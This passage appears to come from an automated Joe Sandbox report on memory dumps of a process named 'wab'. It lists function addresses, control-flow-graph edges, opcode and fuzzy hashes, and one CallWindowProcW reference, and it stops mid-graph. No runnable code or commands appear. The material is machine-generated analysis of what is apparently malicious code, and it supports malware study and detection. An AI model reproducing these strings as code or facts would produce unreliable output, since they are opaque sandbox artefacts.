                                                          • Opcode Fuzzy Hash: b479c11e3c96d215b2da6497a8a043c52073ec86555ac351c2c2ccc79f499112
                                                          • Instruction Fuzzy Hash: 5D330B31D11619CEDB11EF68C880A99F7B1FF99300F15C79AE448B7221EB71AAC5CB81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 28AF89E0 Relevance: 1.8, Strings: 1, Instructions: 589COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1475 28af89e0-28af89fd 1476 28af89ff-28af8a02 1475->1476 1477 28af8a9b-28af8aa1 1476->1477 1478 28af8a08-28af8a0b 1476->1478 1479 28af8aee-28af8af4 1477->1479 1480 28af8aa3 1477->1480 1481 28af8a0d-28af8a0e 1478->1481 1482 28af8a13-28af8a16 1478->1482 1484 28af8afa-28af8b02 1479->1484 1485 28af8bb7-28af8be3 1479->1485 1483 28af8aa8-28af8aab 1480->1483 1481->1482 1486 28af8a1d-28af8a20 1482->1486 1487 28af8a18-28af8a1a 1482->1487 1491 28af8aad-28af8abf 1483->1491 1492 28af8ac4-28af8ac7 1483->1492 1484->1485 1488 28af8b08-28af8b15 1484->1488 1510 28af8bed-28af8bf0 1485->1510 1489 28af8a3d-28af8a40 1486->1489 1490 28af8a22-28af8a38 1486->1490 1487->1486 1488->1485 1493 28af8b1b-28af8b1f 1488->1493 1494 28af8a4a-28af8a4d 1489->1494 1495 28af8a42-28af8a45 1489->1495 1490->1489 1491->1492 1496 28af8ac9-28af8ad2 1492->1496 1497 28af8ad3-28af8ad6 1492->1497 1499 28af8b24-28af8b27 1493->1499 1501 28af8a4f-28af8a5e 1494->1501 1502 28af8a63-28af8a66 1494->1502 1495->1494 1504 28af8ad8-28af8adf 1497->1504 1505 28af8ae4-28af8ae7 1497->1505 1506 28af8b3a-28af8b3d 1499->1506 1507 28af8b29-28af8b2f 1499->1507 1501->1502 1508 28af8a68-28af8a72 1502->1508 1509 28af8a80-28af8a83 1502->1509 1504->1505 1505->1507 1511 28af8ae9-28af8aec 1505->1511 1513 28af8b3f-28af8b42 1506->1513 1514 28af8b47-28af8b4a 1506->1514 1507->1508 1512 28af8b35 1507->1512 1525 28af8a79-28af8a7b 1508->1525 1518 28af8a96-28af8a99 1509->1518 1519 28af8a85-28af8a8b 1509->1519 1516 28af8c12-28af8c15 1510->1516 1517 28af8bf2-28af8bf6 1510->1517 1511->1479 1511->1499 1512->1506 1513->1514 1523 28af8b5e-28af8b61 1514->1523 1524 28af8b4c-28af8b59 1514->1524 1521 28af8c17-28af8c21 1516->1521 1522 28af8c26-28af8c29 1516->1522 1526 28af8bfc-28af8c04 1517->1526 1527 28af8cda-28af8d14 1517->1527 1518->1477 1518->1483 1519->1513 1520 28af8a91 1519->1520 1520->1518 1521->1522 1528 28af8c2b-28af8c3c 1522->1528 1529 28af8c41-28af8c44 1522->1529 1530 28af8b87-28af8b8a 1523->1530 1531 28af8b63-28af8b82 1523->1531 1524->1523 1525->1509 1526->1527 1532 28af8c0a-28af8c0d 1526->1532 1540 28af8d16-28af8d19 1527->1540 1528->1529 1536 28af8c66-28af8c69 1529->1536 1537 28af8c46-28af8c4a 1529->1537 1533 28af8b8c-28af8b90 1530->1533 1534 28af8b97-28af8b99 1530->1534 1531->1530 1532->1516 1541 28af8ba9-28af8bb6 1533->1541 1542 28af8b92 1533->1542 1543 28af8b9b 1534->1543 1544 28af8ba0-28af8ba3 1534->1544 1547 28af8c6b-28af8c72 1536->1547 1548 28af8c79-28af8c7c 1536->1548 1537->1527 1546 28af8c50-28af8c58 1537->1546 1552 28af8d1b-28af8d22 1540->1552 1553 28af8d27-28af8d2a 1540->1553 1542->1534 1543->1544 1544->1476 1544->1541 1546->1527 1554 28af8c5e-28af8c61 1546->1554 1555 28af8c74 1547->1555 1556 28af8cd2-28af8cd9 1547->1556 1550 28af8c7e-28af8c85 1548->1550 1551 28af8c86-28af8c89 1548->1551 1558 28af8c8b-28af8c8f 1551->1558 1559 28af8ca3-28af8ca6 1551->1559 1552->1553 1560 28af8d2c-28af8d2f 1553->1560 1561 28af8d46-28af8eda 1553->1561 1554->1536 1555->1548 1558->1527 1562 28af8c91-28af8c99 1558->1562 1565 28af8ca8-28af8cac 1559->1565 1566 28af8cc0-28af8cc2 1559->1566 1563 28af8d3d-28af8d40 1560->1563 1564 28af8d31-28af8d38 1560->1564 1624 28af9013-28af9026 1561->1624 1625 28af8ee0-28af8ee7 1561->1625 1562->1527 1567 28af8c9b-28af8c9e 1562->1567 1563->1561 1568 28af9029-28af902c 1563->1568 1564->1563 1565->1527 1569 28af8cae-28af8cb6 1565->1569 1571 28af8cc9-28af8ccc 1566->1571 1572 28af8cc4 1566->1572 1567->1559 1573 28af902e-28af903f 1568->1573 1574 28af904a-28af904d 1568->1574 1569->1527 1575 28af8cb8-28af8cbb 1569->1575 1571->1510 1571->1556 1572->1571 1573->1564 1584 28af9045 1573->1584 1576 28af904f-28af9060 1574->1576 1577 28af906b-28af906e 1574->1577 1575->1566 1576->1564 1588 28af9066 1576->1588 1580 28af9086-28af9089 1577->1580 1581 28af9070-28af9083 1577->1581 1582 28af908b-28af909c 1580->1582 1583 28af90a3-28af90a6 1580->1583 1582->1576 1594 28af909e 1582->1594 1583->1561 1587 28af90ac-28af90af 1583->1587 1584->1574 1591 28af90cd-28af90d0 1587->1591 1592 28af90b1-28af90c2 1587->1592 1588->1577 1595 28af90ea-28af90ed 1591->1595 1596 28af90d2-28af90e3 1591->1596 1592->1564 1603 28af90c8 1592->1603 1594->1583 1598 28af90ef-28af90f4 1595->1598 1599 28af90f7-28af90f9 1595->1599 1596->1581 1607 28af90e5 1596->1607 1598->1599 1601 28af90fb 1599->1601 1602 28af9100-28af9103 1599->1602 1601->1602 1602->1540 1606 28af9109-28af9112 1602->1606 1603->1591 1607->1595 1626 28af8eed-28af8f20 1625->1626 1627 28af8f9b-28af8fa2 1625->1627 1638 28af8f25-28af8f66 1626->1638 1639 28af8f22 1626->1639 1627->1624 1629 28af8fa4-28af8fd7 1627->1629 1640 28af8fdc-28af9009 1629->1640 1641 28af8fd9 1629->1641 1649 28af8f7e-28af8f85 1638->1649 1650 28af8f68-28af8f79 1638->1650 1639->1638 1640->1606 1641->1640 1652 28af8f8d-28af8f8f 1649->1652 1650->1606 1652->1606
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2648155851.0000000028AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 28AF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_28af0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $
                                                          • API String ID: 0-3993045852
                                                          • Opcode ID: c0683e6ad93e03f1291a2c4493028300f35372d158aa4ca3d7704013d7aaff14
                                                          • Instruction ID: e1184374698f33b758c4862c8488bc2cf3bdbda5f9e0ffa097c2c4e35d739a46
                                                          • Opcode Fuzzy Hash: c0683e6ad93e03f1291a2c4493028300f35372d158aa4ca3d7704013d7aaff14
                                                          • Instruction Fuzzy Hash: 7122AE71E01209CBDB14DBA4C48479EBBB2FF99310F248479E515AB345DB3AED46CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 28AF5AB0 Relevance: 1.0, Instructions: 1042COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2648155851.0000000028AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 28AF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_28af0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cb2892928afe36137d55fc33cc4e20875183eda014ff4294e4bfde916a7257b1
                                                          • Instruction ID: 4ed14c811f4c6d31e8a80e8bbc7f3dec57934908a73d8050b291d2db1a6c72a7
                                                          • Opcode Fuzzy Hash: cb2892928afe36137d55fc33cc4e20875183eda014ff4294e4bfde916a7257b1
                                                          • Instruction Fuzzy Hash: AC920434A01214CFDB24DF68C588B89BBF2FB49315F5485A9E409AB352DB36ED85CF90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 28AFEA69 Relevance: .6, Instructions: 576COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2648155851.0000000028AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 28AF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_28af0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6c364b85c823860717005cf8d112c2c13756ab64390e3b40b783d65895fccaf3
                                                          • Instruction ID: 71d3971546e6aa9855f181c8701301983abdf4211ce6cd99314928fc67393687
                                                          • Opcode Fuzzy Hash: 6c364b85c823860717005cf8d112c2c13756ab64390e3b40b783d65895fccaf3
                                                          • Instruction Fuzzy Hash: 97227C30B01209DBEB10DB68D48079DB7B2FB99310F248936F509EB792DE76DD918B91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 28AF68A8 Relevance: .5, Instructions: 545COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 3290 28af68a8-28af68c9 3291 28af68cb-28af68ce 3290->3291 3292 28af706f-28af7072 3291->3292 3293 28af68d4-28af68f3 3291->3293 3294 28af7098-28af709a 3292->3294 3295 28af7074-28af7093 3292->3295 3303 28af690c-28af6916 3293->3303 3304 28af68f5-28af68f8 3293->3304 3296 28af709c 3294->3296 3297 28af70a1-28af70a4 3294->3297 3295->3294 3296->3297 3297->3291 3299 28af70aa-28af70b3 3297->3299 3308 28af691c-28af692b 3303->3308 3304->3303 3305 28af68fa-28af690a 3304->3305 3305->3308 3416 28af692d call 28af70c8 3308->3416 3417 28af692d call 28af70c0 3308->3417 3309 28af6932-28af6937 3310 28af6939-28af693f 3309->3310 3311 28af6944-28af6c21 3309->3311 3310->3299 3332 28af6c27-28af6cd6 3311->3332 3333 28af7061-28af706e 3311->3333 3342 28af6cff 3332->3342 3343 28af6cd8-28af6cfd 3332->3343 3345 28af6d08-28af6d1b 3342->3345 3343->3345 3347 28af7048-28af7054 3345->3347 3348 28af6d21-28af6d43 3345->3348 3347->3332 3349 28af705a 3347->3349 3348->3347 3351 28af6d49-28af6d53 3348->3351 3349->3333 3351->3347 3352 28af6d59-28af6d64 3351->3352 3352->3347 3353 28af6d6a-28af6e40 3352->3353 3365 28af6e4e-28af6e7e 3353->3365 3366 28af6e42-28af6e44 3353->3366 3370 28af6e8c-28af6e98 3365->3370 3371 28af6e80-28af6e82 3365->3371 3366->3365 3372 28af6e9a-28af6e9e 3370->3372 3373 28af6ef8-28af6efc 3370->3373 3371->3370 3372->3373 3376 28af6ea0-28af6eca 3372->3376 3374 28af7039-28af7042 3373->3374 3375 28af6f02-28af6f3e 3373->3375 3374->3347 3374->3353 3386 28af6f4c-28af6f5a 3375->3386 3387 28af6f40-28af6f42 3375->3387 3383 28af6ecc-28af6ece 3376->3383 3384 28af6ed8-28af6ef5 3376->3384 3383->3384 3384->3373 3390 28af6f5c-28af6f67 3386->3390 3391 28af6f71-28af6f7c 3386->3391 3387->3386 3390->3391 3394 28af6f69 3390->3394 3395 28af6f7e-28af6f84 3391->3395 3396 28af6f94-28af6fa5 3391->3396 3394->3391 3397 28af6f88-28af6f8a 3395->3397 3398 28af6f86 3395->3398 3400 28af6fbd-28af6fc9 3396->3400 3401 28af6fa7-28af6fad 3396->3401 3397->3396 3398->3396 3405 28af6fcb-28af6fd1 3400->3405 3406 28af6fe1-28af7032 3400->3406 3402 28af6faf 3401->3402 3403 28af6fb1-28af6fb3 3401->3403 3402->3400 3403->3400 3407 28af6fd5-28af6fd7 3405->3407 3408 28af6fd3 3405->3408 3406->3374 3407->3406 3408->3406 3416->3309 3417->3309
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2648155851.0000000028AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 28AF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_28af0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ae57d493c33b7dd63523210ed7362240bbc8bcb79d1945681f18854bba4f0321
                                                          • Instruction ID: 9b6f8a909774a30465c12cbc2ee09957003596422cc5c8fa0fa471d58d85fcbd
                                                          • Opcode Fuzzy Hash: ae57d493c33b7dd63523210ed7362240bbc8bcb79d1945681f18854bba4f0321
                                                          • Instruction Fuzzy Hash: 9C324030E10719CBDB15EB79D890A9DB7B2FFD9300F60C669E409AB211EF31A985CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 28AFB5C0 Relevance: .5, Instructions: 476COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 3418 28afb5c0-28afb5de 3419 28afb5e0-28afb5e3 3418->3419 3420 28afb5e5-28afb5ef 3419->3420 3421 28afb5f0-28afb5f3 3419->3421 3422 28afb60a-28afb60d 3421->3422 3423 28afb5f5-28afb603 3421->3423 3424 28afb60f-28afb62b 3422->3424 3425 28afb630-28afb633 3422->3425 3431 28afb666-28afb67c 3423->3431 3432 28afb605 3423->3432 3424->3425 3426 28afb635-28afb64f 3425->3426 3427 28afb654-28afb656 3425->3427 3426->3427 3429 28afb65d-28afb660 3427->3429 3430 28afb658 3427->3430 3429->3419 3429->3431 3430->3429 3438 28afb897-28afb8a1 3431->3438 3439 28afb682-28afb68b 3431->3439 3432->3422 3440 28afb8a2-28afb8b0 3439->3440 3441 28afb691-28afb6ae 3439->3441 3444 28afb8b2-28afb8d7 3440->3444 3445 28afb931-28afb954 3440->3445 3449 28afb884-28afb891 3441->3449 3450 28afb6b4-28afb6dc 3441->3450 3447 28afb8d9-28afb8dc 3444->3447 3455 28afb95a-28afb96b 3445->3455 3456 28afbae5-28afbafb 3445->3456 3451 28afb8e2-28afb8f1 3447->3451 3452 28afbb11-28afbb14 3447->3452 3449->3438 3449->3439 3450->3449 3475 28afb6e2-28afb6eb 3450->3475 3466 28afb8f3-28afb90e 3451->3466 3467 28afb910-28afb92f 3451->3467 3453 28afbb37-28afbb3a 3452->3453 3454 28afbb16-28afbb32 3452->3454 3458 28afbbe5-28afbbe7 3453->3458 3459 28afbb40-28afbb4c 3453->3459 3454->3453 3468 28afb971-28afb98e 3455->3468 3469 28afbad0-28afbadf 3455->3469 3456->3452 3464 28afbbee-28afbbf1 3458->3464 3465 28afbbe9 3458->3465 3472 28afbb57-28afbb59 3459->3472 3464->3447 3470 28afbbf7-28afbc00 3464->3470 3465->3464 3466->3467 3467->3445 3468->3469 3492 28afb994-28afba8a call 28af99e0 3468->3492 3469->3455 3469->3456 3476 28afbb5b-28afbb61 3472->3476 3477 28afbb71-28afbb75 3472->3477 3475->3440 3480 28afb6f1-28afb70d 3475->3480 3482 28afbb65-28afbb67 3476->3482 3483 28afbb63 3476->3483 3484 28afbb77-28afbb81 3477->3484 3485 28afbb83 3477->3485 3493 28afb713-28afb73d 3480->3493 3494 28afb872-28afb87e 3480->3494 3482->3477 3483->3477 3486 28afbb88-28afbb8a 3484->3486 3485->3486 3490 28afbb8c-28afbb8f 3486->3490 3491 28afbb9b-28afbbd4 3486->3491 3490->3470 3491->3451 3508 28afbbda-28afbbe4 3491->3508 3553 28afba8c-28afba96 3492->3553 3554 28afba98 3492->3554 3505 28afb868-28afb86d 3493->3505 3506 28afb743-28afb76b 3493->3506 3494->3449 3494->3475 3505->3494 3506->3505 3514 28afb771-28afb79f 3506->3514 3514->3505 3519 28afb7a5-28afb7ae 3514->3519 3519->3505 3521 28afb7b4-28afb7e6 3519->3521 3528 28afb7e8-28afb7ec 3521->3528 3529 28afb7f1-28afb80d 3521->3529 3528->3505 3531 28afb7ee 3528->3531 3529->3494 3532 28afb80f-28afb866 call 28af99e0 3529->3532 3531->3529 3532->3494 3555 28afba9d-28afba9f 3553->3555 3554->3555 3555->3469 3556 28afbaa1-28afbaa6 3555->3556 3557 28afbaa8-28afbab2 3556->3557 3558 28afbab4 3556->3558 3559 28afbab9-28afbabb 3557->3559 3558->3559 3559->3469 3560 28afbabd-28afbac9 3559->3560 3560->3469
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2648155851.0000000028AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 28AF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_28af0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b037ab6e72475e894f491e2f0d3ba03bccb0417f5a8903b9a5c3b0b68e8f9bba
                                                          • Instruction ID: 03730c6e55a83492e739bebee71d4523a120d581bdbde7953341e1f9493c8ea6
                                                          • Opcode Fuzzy Hash: b037ab6e72475e894f491e2f0d3ba03bccb0417f5a8903b9a5c3b0b68e8f9bba
                                                          • Instruction Fuzzy Hash: 2B025A30B022059BDB14EB69D494B9EB7F2FF88310F248569E505AB395DF36ED42CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02EF41F8 Relevance: .3, Instructions: 281COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 93f75acc3fc36ece5b53207228c88c432910afd11e27bc7058eb5498f05e2cbd
                                                          • Instruction ID: cc6e51a9388d8079cd644f351fa9766d050e2fdda24c926c17fec7bd3fc86f69
                                                          • Opcode Fuzzy Hash: 93f75acc3fc36ece5b53207228c88c432910afd11e27bc7058eb5498f05e2cbd
                                                          • Instruction Fuzzy Hash: 2CB14DB0E40209CFDB50DFA9D8857DEBBF2AF88318F14D129DA15A7294EB749845CF81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02EF4AC8 Relevance: .3, Instructions: 266COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bfcc3482c99a55ae0c67a97bd4c63064682bf253fecb662da73637f9e5fab6c6
                                                          • Instruction ID: fa59e7a055c865df2543cd624a0ec1cef88f4d199c6ec033d810eae183aedf8d
                                                          • Opcode Fuzzy Hash: bfcc3482c99a55ae0c67a97bd4c63064682bf253fecb662da73637f9e5fab6c6
                                                          • Instruction Fuzzy Hash: DAB1A170E00209CFDB50CFA8C8957DEBBF2AF88318F14D129D615EB294EB759845CB81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02EF3EB0 Relevance: .2, Instructions: 238COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1cd554eeed428d9d8be468e0d7ae1be5b3dc6cf85cbfd2b30a5f6ca9eca7d1d7
                                                          • Instruction ID: 2177430a5d1931fe410b0e87fe48e64b817f2d2f390ba5182986f6f54b57ecb8
                                                          • Opcode Fuzzy Hash: 1cd554eeed428d9d8be468e0d7ae1be5b3dc6cf85cbfd2b30a5f6ca9eca7d1d7
                                                          • Instruction Fuzzy Hash: 6F916971E40209CFDF50CFA9C8857DEBBF2AF88308F14D529E605AB294EB749845CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 28AFE510 Relevance: 2.9, Strings: 2, Instructions: 390COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 0 28afe510-28afe52e 1 28afe530-28afe533 0->1 2 28afe54d-28afe550 1->2 3 28afe535-28afe548 1->3 4 28afe573-28afe576 2->4 5 28afe552-28afe56e 2->5 3->2 7 28afe58a-28afe58d 4->7 8 28afe578-28afe585 4->8 5->4 9 28afe58f-28afe593 7->9 10 28afe59e-28afe5a1 7->10 8->7 13 28afe73c-28afe746 9->13 14 28afe599 9->14 15 28afe5ab-28afe5ae 10->15 16 28afe5a3-28afe5a8 10->16 14->10 17 28afe72d-28afe736 15->17 18 28afe5b4-28afe5b7 15->18 16->15 17->13 20 28afe5b9-28afe5c2 17->20 18->20 21 28afe5d1-28afe5d4 18->21 22 28afe5c8-28afe5cc 20->22 23 28afe747-28afe77e 20->23 24 28afe5d6-28afe5df 21->24 25 28afe5e4-28afe5e6 21->25 22->21 30 28afe780-28afe783 23->30 24->25 26 28afe5ed-28afe5f0 25->26 27 28afe5e8 25->27 26->1 29 28afe5f6-28afe61a 26->29 27->26 42 28afe72a 29->42 43 28afe620-28afe62f 29->43 32 28afe9ec-28afe9ef 30->32 33 28afe789-28afe7c4 30->33 34 28afea12-28afea15 32->34 35 28afe9f1-28afea0d 32->35 40 28afe7ca-28afe7d6 33->40 41 28afe9b7-28afe9ca 33->41 37 28afea17 call 28afea69 34->37 38 28afea24-28afea27 34->38 35->34 48 28afea1d-28afea1f 37->48 45 28afea29-28afea33 38->45 46 28afea34-28afea37 38->46 61 28afe7d8-28afe7f1 40->61 62 28afe7f6-28afe83a 40->62 47 28afe9cc 41->47 42->17 58 28afe647-28afe682 call 28af99e0 43->58 59 28afe631-28afe637 43->59 49 28afea39-28afea3d 46->49 50 28afea48-28afea4a 46->50 60 28afe9cd 47->60 48->38 49->33 51 28afea43 49->51 52 28afea4c 50->52 53 28afea51-28afea54 50->53 51->50 52->53 53->30 57 28afea5a-28afea64 53->57 76 28afe69a-28afe6b1 58->76 77 28afe684-28afe68a 58->77 63 28afe63b-28afe63d 59->63 64 28afe639 59->64 60->60 61->47 78 28afe83c-28afe84e 62->78 79 28afe856-28afe895 62->79 63->58 64->58 91 28afe6c9-28afe6da 76->91 92 28afe6b3-28afe6b9 76->92 80 28afe68e-28afe690 77->80 81 28afe68c 77->81 78->79 85 28afe97c-28afe991 79->85 86 28afe89b-28afe976 call 28af99e0 79->86 80->76 81->76 85->41 86->85 98 28afe6dc-28afe6e2 91->98 99 28afe6f2-28afe723 91->99 94 28afe6bd-28afe6bf 92->94 95 28afe6bb 92->95 94->91 95->91 100 28afe6e6-28afe6e8 98->100 101 28afe6e4 98->101 99->42 100->99 101->99
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2648155851.0000000028AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 28AF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_28af0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: dM$dM
                                                          • API String ID: 0-2801238145
                                                          • Opcode ID: f0e6f3487e4ba9144dc088e4fb69ec0a3449703e61b36ee28ffac163732c5bcf
                                                          • Instruction ID: 10f31239c8e4f24932b8fb8e160e1d110b2e559706399c122bcebd16d92ccd7b
                                                          • Opcode Fuzzy Hash: f0e6f3487e4ba9144dc088e4fb69ec0a3449703e61b36ee28ffac163732c5bcf
                                                          • Instruction Fuzzy Hash: 77E16B70A01209CBEB14DBA8D48079EB7B2FF98300F608539E409AB355DF76E952CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 28AFC268 Relevance: 2.8, Strings: 2, Instructions: 262COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 125 28afc268-28afc28d 126 28afc28f-28afc292 125->126 127 28afc2be-28afc2c1 126->127 128 28afc294-28afc2b3 126->128 129 28afc2c3-28afc2d0 127->129 130 28afc2d1-28afc2d4 127->130 143 28afc2b9 128->143 144 28afc351-28afc494 128->144 131 28afc2fa-28afc2fd 130->131 132 28afc2d6-28afc2f5 130->132 134 28afc2ff 131->134 135 28afc321-28afc324 131->135 132->131 142 28afc309-28afc31c 134->142 138 28afc33f-28afc341 135->138 139 28afc326-28afc338 135->139 140 28afc348-28afc34b 138->140 141 28afc343 138->141 139->129 147 28afc33a 139->147 140->126 140->144 141->140 142->135 143->127 169 28afc4b8-28afc4fd 144->169 170 28afc496-28afc4b0 144->170 147->138 173 28afc60d-28afc622 169->173 174 28afc503-28afc59b call 28af99e0 169->174 170->169 190 28afc59d-28afc5ed 174->190 191 28afc5f8-28afc607 174->191 190->191 191->173 191->174
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2648155851.0000000028AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 28AF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_28af0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: dM$dM
                                                          • API String ID: 0-2801238145
                                                          • Opcode ID: 2d46be2ed7bdda4b5a73e3d3d27c72cdb7c843a3d96a76ec35e7685e6e14a5e4
                                                          • Instruction ID: ccd8c025a0d0a01e19e96e4bec74e90b4313ab369d7c580b823c855f04167905
                                                          • Opcode Fuzzy Hash: 2d46be2ed7bdda4b5a73e3d3d27c72cdb7c843a3d96a76ec35e7685e6e14a5e4
                                                          • Instruction Fuzzy Hash: CCA13A70B012158FEB14EB79C490BAEB7F2EF89300F5085A9D409AB351DF769D868B90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 28AE1080 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1653 28ae1080-28ae10bc 1654 28ae116c-28ae118c 1653->1654 1655 28ae10c2-28ae10c7 1653->1655 1661 28ae118f-28ae119c 1654->1661 1656 28ae111a-28ae1152 CallWindowProcW 1655->1656 1657 28ae10c9-28ae1100 1655->1657 1658 28ae115b-28ae116a 1656->1658 1659 28ae1154-28ae115a 1656->1659 1664 28ae1109-28ae1118 1657->1664 1665 28ae1102-28ae1108 1657->1665 1658->1661 1659->1658 1664->1661 1665->1664
                                                          APIs
                                                          • CallWindowProcW.USER32(?,?,?,?,?), ref: 28AE1141
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2648138291.0000000028AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 28AE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_28ae0000_wab.jbxd
                                                          Similarity
                                                          • API ID: CallProcWindow
                                                          • String ID:
                                                          • API String ID: 2714655100-0
                                                          • Opcode ID: 2db63ab327b5c508968988aa40c005d11cca3b8251d04bad64ddcaf18c96075a
                                                          • Instruction ID: 19fea7a092303181024827c3ceac4bd7277da68cb8565191fd4c15c62814ef11
                                                          • Opcode Fuzzy Hash: 2db63ab327b5c508968988aa40c005d11cca3b8251d04bad64ddcaf18c96075a
                                                          • Instruction Fuzzy Hash: CB4117B8A00259DFDB04CF99C484B9ABBF5FF88311F248559E519AB321D774A941CFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 28AF9A20 Relevance: 1.6, Strings: 1, Instructions: 312COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1667 28af9a20-28af9a4e 1668 28af9a50-28af9a53 1667->1668 1669 28af9a65-28af9a68 1668->1669 1670 28af9a55-28af9a60 1668->1670 1671 28af9a6a-28af9a79 1669->1671 1672 28af9a84-28af9a87 1669->1672 1670->1669 1681 28af9a7f 1671->1681 1682 28af9bd9-28af9bf5 1671->1682 1673 28af9a89 1672->1673 1674 28af9aa8-28af9aab 1672->1674 1683 28af9a93-28af9aa3 1673->1683 1677 28af9aad-28af9ac7 1674->1677 1678 28af9acc-28af9acf 1674->1678 1677->1678 1679 28af9ae1-28af9ae4 1678->1679 1680 28af9ad1-28af9ada 1678->1680 1686 28af9b19-28af9b1c 1679->1686 1687 28af9ae6-28af9b14 1679->1687 1684 28af9b1e-28af9b34 1680->1684 1685 28af9adc 1680->1685 1681->1672 1704 28af9bfa-28af9bfd 1682->1704 1683->1674 1691 28af9b39-28af9b3c 1684->1691 1685->1679 1686->1684 1686->1691 1687->1686 1695 28af9b3e-28af9b51 1691->1695 1696 28af9b56-28af9b59 1691->1696 1695->1696 1697 28af9b5b-28af9b69 1696->1697 1698 28af9b74-28af9b77 1696->1698 1712 28af9b6f 1697->1712 1713 28af9e2d 1697->1713 1701 28af9b79-28af9b93 1698->1701 1702 28af9b98-28af9b9b 1698->1702 1701->1702 1708 28af9b9d-28af9ba0 1702->1708 1709 28af9ba5-28af9ba8 1702->1709 1706 28af9bff-28af9c1e 1704->1706 1707 28af9c29-28af9c2c 1704->1707 1706->1708 1724 28af9c24 1706->1724 1710 28af9c2e-28af9c33 1707->1710 1711 28af9c36-28af9c39 1707->1711 